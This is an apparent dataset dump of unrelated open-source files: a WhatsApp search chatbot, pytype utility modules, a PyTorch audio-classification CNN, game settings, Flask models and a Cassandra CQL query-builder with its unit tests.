metadata (dict) | text (string, lengths 60 to 3.49M)
---|---
{
"source": "jjeanjacques10/chatbot-whatsapp",
"score": 3
} |
#### File: jjeanjacques10/chatbot-whatsapp/botSearch.py
```python
import requests, json, time
import wikipedia
from bot import Bot
class BotSearch(Bot):
def escreveNaTela(self, response):
self.caixa_de_mensagem.send_keys('*{}*:{}'.format(self.nome,response))
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisarWikipedia(self, keyword):
try:
            wikipedia.set_lang("pt") # Set the language before querying
pesquisa = wikipedia.summary(keyword, sentences=5)
wikiaprenda = [keyword, str(pesquisa)]
self.bot.train(wikiaprenda)
except:
pesquisa = 'Termo não encontrado, tente outro'
self.caixa_de_mensagem.send_keys('*{}*:{}'.format(self.nome,pesquisa))
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisarNoticias(self, keyword):
try:
if(keyword == None):
req = requests.get('https://newsapi.org/v2/top-headlines?country=br&category=technology&pageSize=5&apiKey=<KEY>')
noticias = json.loads(req.text)
else:
req = requests.get('https://newsapi.org/v2/top-headlines?q={}&country=br&category=technology&pageSize=5&apiKey=<KEY>'.format(keyword))
noticias = json.loads(req.text)
if(noticias["totalResults"] != 0):
for news in noticias['articles']:
titulo = news['title']
link = news['url']
new = '*'+ self.nome +'*: ' + titulo + ' ' + link + '\n'
self.caixa_de_mensagem.send_keys(new)
time.sleep(1)
else:
                self.escreveNaTela("Não encontrei nada, tem certeza que o termo tem relação com tecnologia?")
except:
pesquisa = "Termo {} não encontrado, tente outro".format(keyword)
self.caixa_de_mensagem.send_keys('*' + self.nome + '*:' + pesquisa)
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisaClima(self):
try:
weather = requests.get('http://apiadvisor.climatempo.com.br/api/v1/weather/locale/3477/current?token=<KEY>')
json_weather1 = weather.json()
weatherText = "\n======Clima em {}/{} ======\n".format(json_weather1["name"], json_weather1["state"])
weatherText += "*Condição* = {}\n".format(json_weather1["data"]["condition"])
weatherText += "*Temperature* = {}ºC\n".format(json_weather1["data"]["temperature"])
weatherText += "*Umidade* = {}%\n".format(json_weather1["data"]["humidity"])
weatherText += "*Espero ter ajudado*"
except:
weatherText = 'Houve um problema, tente mais tarde'
self.escreveNaTela(weatherText)
def PesquisaYoutube(self, keyword):
try:
if (keyword == None):
videos = "Insira um termo para pesquisa"
else:
videos = requests.get(
                'https://www.googleapis.com/youtube/v3/search?part=id%2Csnippet&q={}&type=video&order=relevance&chart=mostPopular&locale=br&maxResults=5&regionCode=br&key={}'.format(
keyword,self.config['KEY']['youtube']))
json_videos = videos.json()
videos = "*Vídeos*\n"
for i in range(len(json_videos["items"])):
try:
nome = json_videos["items"][i]["snippet"]["title"]
link = json_videos["items"][i]["id"]["videoId"]
videos += "{} - https://www.youtube.com/watch?v={}\n".format(nome, link)
except:
videos += "{}\n".format(nome)
self.caixa_de_mensagem.send_keys(videos)
time.sleep(1)
except:
videos = 'Houve um problema, tente mais tarde'
self.escreveNaTela(videos)
``` |
{
"source": "jjedele/pytype",
"score": 3
} |
#### File: pytype/pytype/compare.py
```python
from pytype import abstract
from pytype import mixin
from pytype.pytd import slots
# Equality classes.
NUMERIC = {"__builtin__.bool", "__builtin__.int", "__builtin__.float",
"__builtin__.complex"}
STRING = {"__builtin__.str", "__builtin__.unicode"}
def _incompatible(left_name, right_name):
"""Incompatible primitive types can never be equal."""
for group in NUMERIC, STRING:
if left_name in group and right_name in group:
return False
return True
def _is_primitive(vm, value):
if isinstance(value, mixin.PythonConstant):
return value.pyval.__class__ in vm.convert.primitive_classes
elif isinstance(value, abstract.Instance):
return value.full_name in vm.convert.primitive_class_names
return False
def _is_equality_cmp(op):
return op in (slots.EQ, slots.NE)
def _compare_primitive_value(vm, op, left, right):
if _is_primitive(vm, right) and isinstance(right, mixin.PythonConstant):
try:
return slots.COMPARES[op](left.pyval, right.pyval)
except TypeError:
# TODO(rechen): In host Python 3, some types are not comparable; e.g.,
# `3 < ""` leads to a type error. We should do a Python 2-style comparison
# for target Python 2 and log an error for target Python 3.
pass
return _compare_primitive(op, left, right)
def _compare_primitive(op, left, right):
# Determines when primitives are definitely not equal by checking for
# compatibility of their types.
if (_is_equality_cmp(op) and
isinstance(right, abstract.Instance) and
_incompatible(left.full_name, right.full_name)):
return op != slots.EQ
return None
def _compare_tuple(op, left, right):
# Determines when tuples are definitely not equal by checking their lengths.
if (_is_equality_cmp(op) and
isinstance(right, abstract.Tuple) and
left.tuple_length != right.tuple_length):
return op != slots.EQ
return None
def _compare_dict(op, left, right):
# Determines when dicts are definitely not equal by checking their key sets.
if (_is_equality_cmp(op) and
not left.could_contain_anything and
isinstance(right, abstract.Dict) and
not right.could_contain_anything and
set(left.pyval) != set(right.pyval)):
return op != slots.EQ
return None
def cmp_rel(vm, op, left, right):
"""Compare two variables."""
if _is_primitive(vm, left) and isinstance(left, mixin.PythonConstant):
return _compare_primitive_value(vm, op, left, right)
elif _is_primitive(vm, left) and _is_primitive(vm, right):
return _compare_primitive(op, left, right)
elif isinstance(left, abstract.Tuple):
return _compare_tuple(op, left, right)
elif isinstance(left, abstract.Dict):
return _compare_dict(op, left, right)
else:
return None
```
#### File: pytype/pytype/six_overlay.py
```python
from pytype import metaclass
from pytype import overlay
class SixOverlay(overlay.Overlay):
"""A custom overlay for the 'six' module."""
def __init__(self, vm):
member_map = {
"add_metaclass": build_add_metaclass,
"with_metaclass": build_with_metaclass,
"PY2": build_version_bool(2),
"PY3": build_version_bool(3),
}
ast = vm.loader.import_name("six")
super(SixOverlay, self).__init__(vm, "six", member_map, ast)
def build_add_metaclass(name, vm):
return metaclass.AddMetaclass.make(name, vm, "six")
def build_with_metaclass(name, vm):
return metaclass.WithMetaclass.make(name, vm, "six")
def build_version_bool(major):
return lambda _, vm: vm.convert.bool_values[vm.python_version[0] == major]
```
#### File: pytype/pytype/utils.py
```python
import collections
import contextlib
import itertools
import re
import subprocess
import threading
import types
import weakref
from pytype import pytype_source_utils
# Set this value to True to indicate that pytype is running under a 2.7
# interpreter with the type annotations patch applied.
USE_ANNOTATIONS_BACKPORT = False
def message(error):
"""A convenience function which extracts a message from an exception.
Use this to replace exception.message, which is deprecated in python2 and
removed in python3.
Args:
error: The exception.
Returns:
A message string.
"""
return error.args[0] if error.args else ""
class UsageError(Exception):
"""Raise this for top-level usage errors."""
pass
def format_version(python_version):
"""Format a version tuple into a dotted version string."""
return ".".join([str(x) for x in python_version])
def split_version(version_string):
"""Parse a version string like 2.7 into a tuple."""
return tuple(map(int, version_string.split(".")))
def validate_version(python_version):
"""Raise an exception if the python version is unsupported."""
if len(python_version) != 2:
# This is typically validated in the option parser, but check here too in
# case we get python_version via a different entry point.
raise UsageError("python_version must be <major>.<minor>: %r" %
format_version(python_version))
elif python_version < (2, 7):
raise UsageError("Python version %r is not supported." %
format_version(python_version))
elif (2, 8) <= python_version < (3, 0):
raise UsageError("Python version %r is not a valid Python version." %
format_version(python_version))
elif (3, 0) <= python_version <= (3, 3):
# These have odd __build_class__ parameters, store co_code.co_name fields
# as unicode, and don't yet have the extra qualname parameter to
# MAKE_FUNCTION. Jumping through these extra hoops is not worth it, given
# that typing.py isn't introduced until 3.5, anyway.
raise UsageError(
"Python versions 3.0 - 3.3 are not supported. Use 3.4 and higher.")
elif python_version > (3, 7):
# We have an explicit per-minor-version mapping in opcodes.py
raise UsageError("Python versions > 3.7 are not yet supported.")
def strip_prefix(string, prefix):
"""Strip off prefix if it exists."""
if string.startswith(prefix):
return string[len(prefix):]
return string
def maybe_truncate(s, length=30):
"""Truncate long strings (and append '...'), but leave short strings alone."""
s = str(s)
if len(s) > length-3:
return s[0:length-3] + "..."
else:
return s
def pretty_conjunction(conjunction):
"""Pretty-print a conjunction. Use parentheses as necessary.
E.g. ["a", "b"] -> "(a & b)"
Args:
conjunction: List of strings.
Returns:
A pretty-printed string.
"""
if not conjunction:
return "true"
elif len(conjunction) == 1:
return conjunction[0]
else:
return "(" + " & ".join(conjunction) + ")"
def pretty_dnf(dnf):
"""Pretty-print a disjunctive normal form (disjunction of conjunctions).
E.g. [["a", "b"], ["c"]] -> "(a & b) | c".
Args:
dnf: A list of list of strings. (Disjunction of conjunctions of strings)
Returns:
A pretty-printed string.
"""
if not dnf:
return "false"
else:
return " | ".join(pretty_conjunction(c) for c in dnf)
def numeric_sort_key(s):
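  # e.g. sorted(["v9", "v10"], key=numeric_sort_key) == ["v9", "v10"], since runs of
  # digits are compared as integers rather than character by character.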
return tuple((int(e) if e.isdigit() else e) for e in re.split(r"(\d+)", s))
def concat_tuples(tuples):
return tuple(itertools.chain.from_iterable(tuples))
def get_python_exe(python_version):
"""Automatically infer the --python_exe argument.
Arguments:
python_version: the version tuple (e.g. (2, 7))
Returns:
The inferred python_exe argument
"""
python_exe = "python%d.%d" % python_version
# Use custom interpreters, if provided, in preference to the ones in $PATH
custom_python_exe = pytype_source_utils.get_custom_python_exe(python_exe)
if custom_python_exe:
python_exe = custom_python_exe
if USE_ANNOTATIONS_BACKPORT and python_version == (2, 7):
python_exe += " -T"
return python_exe
def get_python_exe_version(python_exe):
"""Determine the major and minor version of given Python executable.
Arguments:
python_exe: absolute path to the Python executable
Returns:
Version as (major, minor) tuple"""
try:
python_exe_version = subprocess.check_output(
python_exe + " -V", shell=True, stderr=subprocess.STDOUT).decode()
except subprocess.CalledProcessError:
return None
return parse_exe_version_string(python_exe_version)
def parse_exe_version_string(version_str):
"""Parse the version string of a Python executable.
Arguments:
version_str: Version string as emitted by running `PYTHON_EXE -V`
Returns:
Version as (major, minor) tuple"""
# match the major.minor part of the version string, ignore the micro part
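  # e.g. parse_exe_version_string("Python 2.7.16") returns (2, 7)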
matcher = re.search(r'Python (\d+\.\d+)\.\d+', version_str)
if matcher:
return split_version(matcher.group(1))
else:
return None
def list_startswith(l, prefix):
"""Like str.startswith, but for lists."""
return l[:len(prefix)] == prefix
def list_strip_prefix(l, prefix):
"""Remove prefix, if it's there."""
return l[len(prefix):] if list_startswith(l, prefix) else l
def _arg_names(f):
"""Return the argument names of a function."""
return f.__code__.co_varnames[:f.__code__.co_argcount]
class memoize(object): # pylint: disable=invalid-name
"""A memoizing decorator that supports expressions as keys.
Use it like this:
@memoize
def f(x):
...
or
@memoize("(id(x), y)")
def f(x, y, z):
...
.
Careful with methods. If you have code like
@memoize("x")
def f(self, x):
...
then memoized values will be shared across instances.
This decorator contains some speed optimizations that make it not thread-safe.
"""
def __new__(cls, key_or_function):
if isinstance(key_or_function, types.FunctionType):
f = key_or_function
key = "(" + ", ".join(_arg_names(f)) + ")"
return memoize(key)(f)
else:
key = key_or_function
return object.__new__(cls)
def __init__(self, key):
self.key = key
def __call__(self, f):
key_program = compile(self.key, filename=__name__, mode="eval")
argnames = _arg_names(f)
memoized = {}
no_result = object()
if f.__defaults__:
defaults = dict(zip(argnames[-len(f.__defaults__):], f.__defaults__))
else:
defaults = {}
pos_and_arg_tuples = list(zip(range(f.__code__.co_argcount), argnames))
shared_dict = {}
# TODO(kramm): Use functools.wraps or functools.update_wrapper to preserve
# the metadata of the original function.
def call(*posargs, **kwargs):
"""Call a memoized function."""
if kwargs or defaults:
# Slower version; for default arguments, we need two dictionaries.
args = defaults.copy()
args.update(dict(zip(argnames, posargs)))
args.update(kwargs)
key = eval(key_program, args) # pylint: disable=eval-used
else:
# Faster version, if we have no default args.
for pos, arg in pos_and_arg_tuples:
# We know we write *all* the values, so we can re-use the dictionary.
shared_dict[arg] = posargs[pos]
key = eval(key_program, shared_dict) # pylint: disable=eval-used
result = memoized.get(key, no_result)
if result is no_result:
# Call the actual function.
result = f(*posargs, **kwargs)
memoized[key] = result
return result
return call
def invert_dict(d):
"""Invert a dictionary.
Converts a dictionary (mapping strings to lists of strings) to a dictionary
that maps into the other direction.
Arguments:
d: Dictionary to be inverted
Returns:
A dictionary n with the property that if "y in d[x]", then "x in n[y]".
"""
inverted = collections.defaultdict(list)
for key, value_list in d.items():
for val in value_list:
inverted[val].append(key)
return inverted
class DynamicVar(object):
"""A dynamically scoped variable.
This is a per-thread dynamic variable, with an initial value of None.
The bind() call establishes a new value that will be in effect for the
duration of the resulting context manager. This is intended to be used
in conjunction with a decorator.
"""
def __init__(self):
self._local = threading.local()
def _values(self):
values = getattr(self._local, "values", None)
if values is None:
values = [None] # Stack of bindings, with an initial default of None.
self._local.values = values
return values
@contextlib.contextmanager
def bind(self, value):
"""Bind the dynamic variable to the supplied value."""
values = self._values()
try:
values.append(value) # Push the new binding.
yield
finally:
values.pop() # Pop the binding.
def get(self):
"""Return the current value of the dynamic variable."""
return self._values()[-1]
class AnnotatingDecorator(object):
"""A decorator for storing function attributes.
Attributes:
lookup: maps functions to their attributes.
"""
def __init__(self):
self.lookup = {}
def __call__(self, value):
def decorate(f):
self.lookup[f.__name__] = value
return f
return decorate
class VirtualMachineWeakrefMixin(object):
__slots__ = ["vm_weakref"]
def __init__(self, vm):
self.vm_weakref = weakref.ref(vm)
@property
def vm(self):
return self.vm_weakref()
``` |
{
"source": "JJediny/fismatic",
"score": 3
} |
#### File: fismatic/test/test_demo.py
```python
from ..control import Control
from ..control_set import ControlSet
from ..demo import similar_implementations
def test_similar_implementations_empty():
results = similar_implementations([], "foo", "a", "bar")
assert results == []
def test_similar_implementations_excludes_blank():
control = Control("AC-2")
control.implementation = {"A": " "}
control_set = ControlSet([control])
results = similar_implementations([control_set], "AC-2", "A", "foo")
assert results == []
def test_similar_implementations():
control1 = Control("AC-1")
control1.implementation = {"A": "Something else."}
control2 = Control("AC-2")
imp1 = "This is about computers."
control2.implementation = {"A": imp1}
control_set1 = ControlSet([control1, control2])
control3 = Control("AC-2")
imp2 = "This is also about computers. Computers do a lot."
control3.implementation = {"A": imp2}
control_set2 = ControlSet([control3])
control4 = Control("AC-2")
imp3 = "Irrelevant."
control4.implementation = {"A": imp3}
control_set3 = ControlSet([control4])
control_sets = [control_set1, control_set2, control_set3]
results = similar_implementations(control_sets, "AC-2", "A", "computers")
result_txt = [imp.text for imp in results]
assert result_txt == [imp2, imp1, imp3]
``` |
{
"source": "jjeeffff/Musical-Instrument-Recognition",
"score": 3
} |
#### File: Musical-Instrument-Recognition/cnn/CNN.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils import data
import numpy as np
# Load data
data_set = np.load("data_set.npy")
target_set = np.load("target_set.npy")
num_instru = int(np.max(target_set)) + 1
# Hyper parameters
EPOCH = 30
BATCH_SIZE = 200
LEARNING_RATE = 1e-3
# Convert to Tensor
X = torch.from_numpy(data_set)
X = Variable(X.unsqueeze_(1).float())
Y = Variable(torch.from_numpy(target_set))
train_data = data.TensorDataset(X, Y)
train_loader = data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)
#test_x = Variable(torch.unsqueeze(test_data.test_data, dim=1), volatile=True).type(torch.FloatTensor)[:2000]/255.
#test_y = test_data.test_lables[:2000]
# CNN structure
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Sequential( # Input shape: 1*64*200
nn.Conv2d(in_channels=1,
out_channels=16,
kernel_size=5,
stride=2,
padding=0), # Shape: 16*30*98
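                        # Per-dimension conv output size: floor((in - kernel) / stride) + 1,
                        # e.g. height: (64 - 5) // 2 + 1 = 30, width: (200 - 5) // 2 + 1 = 98.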
nn.MaxPool2d(kernel_size=2) # Shape: 16*15*49
)
self.full_conn = nn.Sequential(
nn.Linear(16*15*49, 1024),
nn.ReLU(),
nn.Linear(1024, num_instru)
)
def forward(self, x):
x = self.conv1(x)
x = x.view(x.size(0), -1) # Flatten to (BATCH_SIZE, 16*15*49)
output = self.full_conn(x)
return output
cnn = CNN()
# Optimizer
optimizer = torch.optim.Adam(cnn.parameters(), lr=LEARNING_RATE)
# Loss Function
loss_func = nn.CrossEntropyLoss()
# Training process
for epoch in range(EPOCH):
for batch_x, batch_y in train_loader:
batch_x, batch_y = Variable(batch_x), Variable(batch_y)
# Perform forward pass
output = cnn(batch_x)
# Compute loss
loss = loss_func(output, batch_y)
# Clear the gradients
optimizer.zero_grad()
# Perform backward pass
loss.backward()
# Update the parameters
optimizer.step()
# Print progress
if epoch % 5 == 0:
predicted = torch.argmax(cnn(X), dim=1).view(-1)
# Calculate and print the training accuracy
total = Y.size(0)
correct = predicted == Y
print('Epoch [%d/%d] Accuracy: %.4f%%'
% (epoch, EPOCH, 100*sum(correct.numpy())/total))
``` |
{
"source": "jjeejj/alien_invasion",
"score": 3
} |
#### File: jjeejj/alien_invasion/settings.py
```python
class Settings():
    '''Stores the game's settings'''
def __init__(self):
        '''Initialize the game's static settings'''
self.screen_width = 850
self.screen_heght = 600
self.bg_color = (230, 230, 230)
        # Player ship count setting
self.ship_limit = 3
        # Bullet settings
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
self.bullets_allowed = 10
        # Alien settings
        ## Alien movement speed
self.fleet_drop_speed = 5
self.speedup_scale = 1.1
self.initialize_dynamic_settings()
def initialize_dynamic_settings(self):
        self.fleet_direction = 1 # 1 means move right, -1 means move left
        self.ship_speed_factor = 5.3 # movement step size
self.bullet_speed_factor = 30
self.alien_speed_factor = 1
def increase_speedO(self):
        '''Increase the speed settings'''
self.alien_speed_factor *= self.speedup_scale
self.ship_speed_factor *= self.speedup_scale
        self.bullet_speed_factor *= self.speedup_scale
``` |
{
"source": "jjelarmo/Basic-Interpreter",
"score": 3
} |
#### File: jjelarmo/Basic-Interpreter/shell.py
```python
import basic
def run(text):
lexer = basic.Lexer(text)
tokens = lexer.make_tokens()
return tokens
while True:
text = input('basic > ')
result = run(text)
print(result)
``` |
{
"source": "jjelosua/ML_audio_classification",
"score": 3
} |
#### File: preprocess/scripts/generate_audio_image.py
```python
import os
from csvkit.py3 import CSVKitDictReader, CSVKitDictWriter
import numpy as np
import matplotlib.pyplot as plt
import librosa
# Parallel execution libs
from joblib import Parallel, delayed
from collections import defaultdict
import joblib.parallel
# PARALLEL EXECUTION SETTINGS
# Override joblib callback default callback behavior
class BatchCompletionCallBack(object):
completed = defaultdict(int)
def __init__(self, dispatch_timestamp, batch_size, parallel):
self.dispatch_timestamp = dispatch_timestamp
self.batch_size = batch_size
self.parallel = parallel
def __call__(self, out):
BatchCompletionCallBack.completed[self.parallel] += 1
if BatchCompletionCallBack.completed[self.parallel] % 10 == 0:
print("processed {} items"
.format(BatchCompletionCallBack.completed[self.parallel]))
if self.parallel._original_iterator is not None:
self.parallel.dispatch_next()
# MonkeyPatch BatchCompletionCallBack
joblib.parallel.BatchCompletionCallBack = BatchCompletionCallBack
# GLOBAL SETTINGS
cwd = os.path.dirname(__file__)
INPUT_PATH = os.path.join(cwd, '../../data/input')
INPUT_FILES = {
'train': 'labeled_wav_local',
'test': 'unlabeled_wav_local'
}
OUTPUT_FILES = {
'train': 'labeled_wav_image_local',
'test': 'unlabeled_wav_image_local'
}
OUTPUT_PATH = os.path.abspath(os.path.join(cwd, '../../data/output/images'))
HEADER = ['title', 'audio_file', 'image_file', 'length', 'label']
PLOT_DURATION = 60
SAMPLE_RATE = 8000
N_CORES = 7
def gen_picture(audio_path, image_path, duration):
y, sr = librosa.load(audio_path, duration=duration, sr=None)
# Fix the duration in order to generate a fair feature
# y = librosa.util.fix_length(y, duration * SAMPLE_RATE)
# Generate subplot
fig, ax = plt.subplots(1)
    # Give some margin to accommodate the plot
ax.set_ylim([-1.1, 1.1])
# Config the specs of the image
ax.spines['top'].set_linewidth(0.5)
ax.spines['right'].set_linewidth(0.5)
ax.spines['bottom'].set_linewidth(0.5)
ax.spines['left'].set_linewidth(0.5)
ax.spines['top'].set_color('black')
ax.spines['right'].set_color('black')
ax.spines['bottom'].set_color('black')
ax.spines['left'].set_color('black')
ax.set_ylabel('Amplitud')
ax.set_xlabel('Segundos')
ax.yaxis.label.set_color('black')
ax.xaxis.label.set_color('black')
# Plot the audio image
plt.plot(np.linspace(0.0, y.size/sr, y.size), y, color='#5f8724')
try:
fig.savefig(image_path,
figsize=(8, 6),
facecolor='white',
transparent=True,
dpi=100)
finally:
plt.clf()
plt.close()
def make_plot(labeled, row):
'''make a plot from the audio file'''
dataset = 'train' if labeled else 'test'
result = {
'title': row['title'],
'audio_file': None,
'image_file': None,
'length': None,
'label': None
}
audio_path = row['audio_file']
fname = audio_path.split('/')[-1]
fname = fname.replace('.wav', '.png')
image_path = '{}/{}/{}'.format(OUTPUT_PATH, dataset, fname)
result['audio_file'] = row['audio_file']
result['image_file'] = image_path
result['length'] = row['length']
result['label'] = row['label']
try:
if not os.path.exists(image_path):
gen_picture(audio_path, image_path, PLOT_DURATION)
except Exception as e:
print("found error in %s at %s. Reason %s" % (
image_path,
PLOT_DURATION,
e))
return result
def process_audios(labeled=True):
'''extract the image of the audio file'''
dataset = 'train' if labeled else 'test'
with open('%s/%s.csv' % (INPUT_PATH, OUTPUT_FILES[dataset]), 'w') as fout:
writer = CSVKitDictWriter(fout, fieldnames=HEADER)
writer.writeheader()
with open('%s/%s.csv' % (INPUT_PATH, INPUT_FILES[dataset]), 'r') as f:
reader = CSVKitDictReader(f)
r = Parallel(n_jobs=N_CORES)(delayed(make_plot)(labeled, row)
for row in reader)
print('finished processing {}.csv'.format(INPUT_FILES[dataset]))
writer.writerows(r)
def create_folders(paths=None):
for path in paths:
if not os.path.exists(path):
os.makedirs(path)
def create_folder_structure():
'''Create a list of the required folders for the script execution'''
paths = [
# Training set audio files
'%s/train' % OUTPUT_PATH,
# Test set audio files
'%s/test' % OUTPUT_PATH]
create_folders(paths)
def run():
# Initialize execution context
create_folder_structure()
# Download training set
# Download test set
process_audios(labeled=True)
process_audios(labeled=False)
if __name__ == '__main__':
run()
``` |
{
"source": "JJendryka/Chores",
"score": 3
} |
#### File: JJendryka/Chores/models.py
```python
from flask_sqlalchemy import SQLAlchemy
from authlib.integrations.sqla_oauth2 import OAuth2ClientMixin, OAuth2TokenMixin, OAuth2AuthorizationCodeMixin
from flask_bcrypt import generate_password_hash, check_password_hash
db = SQLAlchemy()
def init_app(app):
db.init_app(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(60), unique=True, nullable=False)
password = db.Column(db.Text, nullable=False)
is_admin = db.Column(db.Boolean, nullable=False)
counters = db.relationship('Counter', backref='user', lazy=True)
def get_user_id(self):
return self.id
def check_password(self, password):
return check_password_hash(self.password, password)
def set_password(self, password):
self.password = generate_password_hash(password)
class Chore(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(60), unique=True, nullable=False)
period_of_days = db.Column(db.Integer, nullable=False)
cooldown_time = db.Column(db.Integer)
minimum_point = db.Column(db.Integer)
counters = db.relationship('Counter', backref='chore', lazy=True)
class Counter(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.Integer, nullable=False)
multiplier = db.Column(db.Float)
chore_id = db.Column(db.Integer, db.ForeignKey('chore.id', ondelete='CASCADE'), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'), nullable=False)
class Client(db.Model, OAuth2ClientMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'))
user = db.relationship('User')
class Token(db.Model, OAuth2TokenMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'))
user = db.relationship('User')
class AuthorizationCode(db.Model, OAuth2AuthorizationCodeMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(
db.Integer, db.ForeignKey('user.id', ondelete='CASCADE')
)
user = db.relationship('User')
``` |
{
"source": "jjengo/cql-builder",
"score": 3
} |
#### File: cql-builder/cql_builder/assignment.py
```python
from cql_builder.base import Assignment, ValidationError
# {key=value, key=value, ...}
class Set(Assignment):
def __init__(self, **kwargs):
self.kwargs = kwargs
@property
def cql(self):
return ', '.join('{}=%s'.format(k) for k in self.kwargs.keys())
@property
def values(self):
return self.kwargs.values()
# names['foo'] = 'bar'
# names[2] = 'foo'
class SetAt(Assignment):
def __init__(self, name, key, value):
self.name = name
self.key = key
self.value = value
@property
def cql(self):
return '{}[%s] = %s'.format(self.name)
@property
def values(self):
return [self.key, self.value]
# name = name + {value, value, ...}
# name = name + [value, value, ...]
class Add(Assignment):
def __init__(self, name, value):
self.name = name
self.value = value
@property
def cql(self):
return '{}={} + %s'.format(self.name, self.name)
@property
def values(self):
return [self.value]
# name = name - {value, value, ...}
# name = name - [value, value, ...]
class Subtract(Assignment):
def __init__(self, name, value):
self.name = name
self.value = value
@property
def cql(self):
return '{}={} - %s'.format(self.name, self.name)
@property
def values(self):
return [self.value]
# assignment, assignment, ...
class Assignments(Assignment):
def __init__(self):
self.assignments = []
def add(self, *assignment):
self.assignments.extend(assignment)
@property
def cql(self):
return ', '.join(assign.cql for assign in self.assignments)
@property
def values(self):
value_list = []
for assign in self.assignments:
value_list.extend(assign.values)
return value_list
def validate(self):
if not self.assignments:
raise ValidationError('assignments is empty')
for assign in self.assignments:
if assign is None:
raise ValidationError('assignment: {}'.format(assign))
if not isinstance(assign, Assignment):
raise ValidationError('assignment {!r} must be of type Assignment'.format(assign))
```
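Each assignment helper above exposes a `cql` template with `%s` placeholders plus a matching `values` list, and the condition helpers (`Where`, `eq`, ...) exercised in `test_condition.py` further down follow the same contract. A minimal sketch, using only classes visible in this repo's files, of how such fragments compose (the statement classes returned by `QueryBuilder` below are assumed to stitch fragments like these together):
```python
# Hedged sketch: only helpers shown elsewhere in this repo are used.
from cql_builder.assignment import Assignments, Set, Add
from cql_builder.condition import Where, eq

assignments = Assignments()
assignments.add(Set(age=30), Add('tags', {'new'}))
where = Where(eq('user_id', 42))

# Each helper contributes a CQL template plus the values bound to its placeholders.
print(assignments.cql)     # age=%s, tags=tags + %s
print(assignments.values)  # [30, {'new'}]
print(where.cql)           # user_id=%s
print(where.values)        # [42]
```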
#### File: cql-builder/cql_builder/builder.py
```python
from cql_builder.statement import Insert, Update, Select, Delete, Truncate
class QueryBuilder(object):
@staticmethod
def insert_into(column_family, keyspace=None):
return Insert(column_family, keyspace)
@staticmethod
def update(column_family, keyspace=None):
return Update(column_family, keyspace)
@staticmethod
def select_from(column_family, keyspace=None):
return Select(column_family, keyspace)
@staticmethod
def delete_from(column_family, keyspace=None):
return Delete(column_family, keyspace)
@staticmethod
def truncate(column_family, keyspace=None):
return Truncate(column_family, keyspace)
```
#### File: cql-builder/cql_builder/selection.py
```python
from cql_builder.base import Selection
# column, column, ...
class Columns(Selection):
def __init__(self, *args):
self.args = args
@property
def cql(self):
return ', '.join(self.args)
@property
def values(self):
return []
# column[key]
class ValueAt(Selection):
def __init__(self, name, key):
self.name = name
self.key = key
@property
def cql(self):
return '{}[%s]'.format(self.name)
@property
def values(self):
return [self.key]
# COUNT(*)
class Count(Selection):
@property
def cql(self):
return 'COUNT(*)'
@property
def values(self):
return []
# *
class All(Selection):
@property
def cql(self):
return '*'
@property
def values(self):
return []
```
#### File: cql-builder/tests/test_condition.py
```python
import unittest
from unittest import TestCase
from datetime import timedelta
from cql_builder.base import ValidationError
from cql_builder.condition import AllEqual, In, Where, Using
from cql_builder.condition import eq, gt, gte, lt, lte
class TestComparison(TestCase):
def test_eq(self):
name, value = 'x', 13
comp = eq(name, value)
self.assertEquals(comp.cql, '{}=%s'.format(name))
self.assertEquals(comp.values, [value])
def test_gt(self):
name, value = 'x', 13
comp = gt(name, value)
self.assertEquals(comp.cql, '{}>%s'.format(name))
self.assertEquals(comp.values, [value])
def test_gte(self):
name, value = 'x', 13
comp = gte(name, value)
self.assertEquals(comp.cql, '{}>=%s'.format(name))
self.assertEquals(comp.values, [value])
def test_lt(self):
name, value = 'x', 13
comp = lt(name, value)
self.assertEquals(comp.cql, '{}<%s'.format(name))
self.assertEquals(comp.values, [value])
def test_lte(self):
name, value = 'x', 13
comp = lte(name, value)
self.assertEquals(comp.cql, '{}<=%s'.format(name))
self.assertEquals(comp.values, [value])
class TestAll(TestCase):
def test_eq_single(self):
kwargs = {'last': 'foo'}
cond = AllEqual(**kwargs)
self.assertEquals(cond.cql, '{}=%s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
def test_eq_multi(self):
kwargs = {'first': 'foo', 'last': 'bar'}
cond = AllEqual(**kwargs)
self.assertEquals(cond.cql, '{}=%s AND {}=%s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
class TestIn(TestCase):
def test_list_value(self):
name, value = 'name', ['foo', 13]
cond = In(name, value)
self.assertEquals(cond.cql, '{} IN (%s, %s)'.format(name))
self.assertEquals(cond.values, value)
def test_set_value(self):
name, value = 'name', set(['foo', 13])
cond = In(name, value)
self.assertEquals(cond.cql, '{} IN (%s, %s)'.format(name))
self.assertEquals(cond.values, value)
def test_not_iterable_value(self):
self.assertRaises(ValidationError, In, 'name', None)
self.assertRaises(ValidationError, In, 'name', 13)
class TestUsing(TestCase):
def test_option_single(self):
cond = Using(ttl=3600)
self.assertEquals(cond.cql, 'USING TTL %s')
self.assertEquals(cond.values, [3600])
def test_option_multi(self):
kwargs = {'TTL': 3600, 'TIMESTAMP': 3600}
cond = Using(**kwargs)
self.assertEquals(cond.cql, 'USING {} %s AND {} %s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
def test_option_timedelta(self):
kwargs = {'TTL': timedelta(hours=1)}
cond = Using(**kwargs)
self.assertEquals(cond.values, [3600])
class TestWhere(TestCase):
def test_condition_single(self):
cond = eq('name', 'foo')
where = Where(cond)
self.assertEquals(where.cql, cond.cql)
self.assertEquals(where.values, cond.values)
